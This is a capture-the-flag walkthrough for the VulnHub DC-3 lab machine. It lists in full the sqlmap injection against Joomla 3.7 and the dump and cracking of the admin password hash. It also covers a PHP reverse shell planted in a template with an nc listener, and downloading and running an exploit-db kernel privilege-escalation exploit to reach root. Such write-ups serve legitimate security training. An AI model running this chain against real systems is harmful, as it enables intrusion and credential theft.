CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


02/12/2024 Shad Hussain Knowledge Views 221 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC3 - VulnHub

Machine Link : https://www.vulnhub.com/entry/dc-32,312/ STEP1 nmap 192.168.31.62 -p- -Pn -A -T4 FINDING 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) ------------------------------------------------------------------------------------------------------------ STEP2 dirb http://192.168.31.62/ dirb http://192.168.31.62/ -X .txt FINDING == DIRECTORY: http://192.168.31.62/administrator/ http://192.168.31.62/README.txt * Joomla! 3.7 version history - https://docs.joomla.org/Joomla_3.7_version_history ------------------------------------------------------------------------------------------------------------ STEP3 search exploit for joomla 3.7 in google FINDING https://www.exploit-db.com/exploits/42033 ------------------------------------------------------------------------------------------------------------ STEP4 sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] FINDING available databases [5]: [*] information_schema [*] joomladb [*] mysql [*] performance_schema [*] sys ------------------------------------------------------------------------------------------------------------ STEP5 sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch Database: joomladb [76 tables] +---------------------+ | #__assets | | #__associations | | #__banner_clients | | #__banner_tracks | | #__banners | | #__bsms_admin | | #__bsms_books | | #__bsms_comments | | #__bsms_locations | | #__bsms_mediafiles | | #__bsms_message_typ | | #__bsms_podcast | | #__bsms_series | | #__bsms_servers | | #__bsms_studies | | #__bsms_studytopics | | #__bsms_teachers | | #__bsms_templatecod | | #__bsms_templates | | #__bsms_timeset | | #__bsms_topics | | #__bsms_update | | #__categories | | #__contact_details | | #__content_frontpag | | #__content_rating | | #__content_types | | #__content | | #__contentitem_tag_ | | #__core_log_searche | | #__extensions | | #__fields_categorie | | #__fields_groups | | #__fields_values | | #__fields | | #__finder_filters | | #__finder_links_ter | | #__finder_links | | #__finder_taxonomy_ | | #__finder_taxonomy | | #__finder_terms_com | | #__finder_terms | | #__finder_tokens_ag | | #__finder_tokens | | #__finder_types | | #__jbsbackup_timese | | #__jbspodcast_times | | #__languages | | #__menu_types | | #__menu | | #__messages_cfg | | #__messages | | #__modules_menu | | #__modules | | #__newsfeeds | | #__overrider | | #__postinstall_mess | | #__redirect_links | | #__schemas | | #__session | | #__tags | | #__template_styles | | #__ucm_base | | #__ucm_content | | #__ucm_history | | #__update_sites_ext | | #__update_sites | | #__updates | | #__user_keys | | #__user_notes | | #__user_profiles | | #__user_usergroup_m | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels | +---------------------+ ------------------------------------------------------------------------------------------------------------ STEP6 sqlmap -u "http://192.168.31.62/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T #__users -C name,password --dump --batch FINDING Table: #__users [1 entry] +--------+--------------------------------------------------------------+ | name | password | +--------+--------------------------------------------------------------+ | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | +--------+--------------------------------------------------------------+ echo $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu dc3hash.txt john dc3hash.txt snoopy -- is the password ------------------------------------------------------------------------------------------------------------ STEP7 http://192.168.31.62/administrator/ admin -- snoopy ------------------------------------------------------------------------------------------------------------ STEP8 visit -- http://192.168.31.62/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA%3D%3D make changes in index.php replace all code with php revershell code save it and on new terminal nc -nvlp 1234 on new browser http://192.168.31.62/templates/beez3/index.php get reverse shell ------------------------------------------------------------------------------------------------------------ STEP9 on shell python -c import pty; pty.spawn("/bin/bash") uname -a lsb_release -a FINDING No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04 LTS Release: 16.04 Codename: xenial ------------------------------------------------------------------------------------------------------------ STEP10 on new terminal searchsploit ubuntu 16.04 FINDING Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() bpf(BPF_PROG_LOAD) Privilege Es | linux/local/39772.txt ------------------------------------------------------------------------------------------------------------ STEP11 search in exploitdb https://www.exploit-db.com/exploits/39772 at bottom of exploit text you will find the download link Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip in nc terminal cd /tmp wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip unzip 39772 ls FINDING Archive: 39772.zip creating: 39772/ inflating: 39772/.DS_Store creating: __MACOSX/ creating: __MACOSX/39772/ inflating: __MACOSX/39772/._.DS_Store inflating: 39772/crasher.tar inflating: __MACOSX/39772/._crasher.tar inflating: 39772/exploit.tar inflating: __MACOSX/39772/._exploit.tar ------------------------------------------------------------------------------------------------------------ STEP12 importants inflating: __MACOSX/39772/._exploit.tar inflating: __MACOSX/39772/._crasher.tar in nc terminal tar -xvf exploit.tar ls cd cd ebpf_mapfd_doubleput_exploit FINDING compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c ------------------------------------------------------------------------------------------------------------ STEP13 ./compile.sh ./doubleput whoami root cd /root ls the-flag.txt cat the-flag.txt __ __ _ _ ____ _ _ _ _ \ \ / /__| | | | _ \ ___ _ __ ___| | | | | \ \ /\ / / _ \ | | | | | |/ _ \| _ \ / _ \ | | | | \ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_| \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_) Congratulations are in order. :-) I hope youve enjoyed this challenge as I enjoyed making it. If there are any ways that I can improve these little challenges, please let me know. As per usual, comments and complaints can be sent via Twitter to @DCAU7 Have a great day!!!! -------------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved